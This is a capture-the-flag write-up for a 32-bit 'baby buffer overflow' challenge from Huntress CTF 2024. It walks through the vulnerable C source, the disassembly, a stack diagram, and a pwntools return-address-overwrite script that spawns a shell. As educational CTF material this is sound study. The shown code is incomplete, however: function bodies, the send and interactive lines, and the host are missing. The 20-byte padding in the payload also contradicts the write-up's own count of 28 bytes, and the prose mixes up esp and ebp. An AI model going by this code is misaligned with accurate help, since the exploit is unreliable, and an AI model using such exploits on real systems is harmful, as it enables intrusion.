Baby Buffer Overflow - 32bit (Huntress CTF 2024)

By: Yukna on

Author: @aenygma

Can you command this program to where it cannot go? To get the flag, you must somehow take control of its excecution. Is it even possible?

Looking at the provided C code:

#include <stdio.h>
#include <unistd.h>

//gcc -fno-pie -no-pie -Wno-implicit-function-declaration -fno-stack-protector -m32 babybufov.c -o babybufov

void target(){
    char* executable="/bin/bash";
    char* argv[]={executable, NULL};

int vuln(){
    char buf[16];
    return 0;

int main(){
    puts("Gimme some data!");
    puts("Failed... :(");

We can tell that there is no stack pointer protection, and to help us, position-independent executable compiling is disable. This means function stack frames are placed back-to-back and addresses are as they would be. We want to hit the buffer in vuln() so that the return function returns back up to target instead of back to main. Decompiling the offered program in Binja, the target is mapped to location 080491f5 int32_t target(), while the vuln is as follows:

08049236  int32_t vuln()

08049236  55                 push    ebp {__saved_ebp}
08049237  89e5               mov     ebp, esp {__saved_ebp}
08049239  83ec18             sub     esp, 0x18
0804923c  83ec0c             sub     esp, 0xc
0804923f  8d45e8             lea     eax, dword ptr [ebp-0x18 {var_1c}]
08049242  50                 push    eax {var_1c} {var_2c}
08049243  e8d8fdffff         call    gets
08049248  83c410             add     esp, 0x10
0804924b  b800000000         mov     eax, 0x0
08049250  c9                 leave    {__saved_ebp}
08049251  c3                 ret      {__return_addr}

We are interested in the location in the stack that stores the buffer, and the location that the __saved_ebp is pushed it.

  1. push ebp {__saved_ebp} stores the previous base stack pointer value to the stack,
  2. mov ebp, esp {__saved_ebp} sets the new stack base to the current stack pointer
  3. sub esp, 0x18 increases the stack by 0x18 bytes
  4. lea eax, dword ptr [ebp-0x18 {var_1c}] calculates the effective address of 0x18 bytes behind the stack pointer.

This is what it would look like:

    +----------+ \
    | ret addr | |
    +-        -+ |
    | ret addr | | 
    +-        -+ | portion we target
    | ret addr | |
    +-        -+ |
    | ret addr | |
    +----------+ / 
    | old ebp  |
    +-        -+
    | old ebp  |
    +-        -+
    | old ebp  |
    +-        -+
    | old ebp  |
    +----------+ <- ebp
    |          |
    +----------+ <- esp-0x18
    |          | 
    +----------+ <- esp

Starting from the esp below, data will get pushed in up until the last blank byte at esp-0x18. So by entering 24 random characters, we hit the and of the stack. The next four bytes are the old esp position, and above that is the precious {__return_addr}. We will need to key in 0x080491f5, but not with ascii characters of course. So we use pwntools in python to help us.

from pwn import *

target_function_address = 0x080491f5  # Address of target function

# Construct the payload
payload = b'A' * 16 + b'B' * 4 + p32(target_function_address)

# Connect to the remote service
p = remote("", PORT)

# Send the payload

# Drop into interactive mode to access the shell

We get dropped into the shell after running this, and we are free to roam the world (and print the file containing the flag).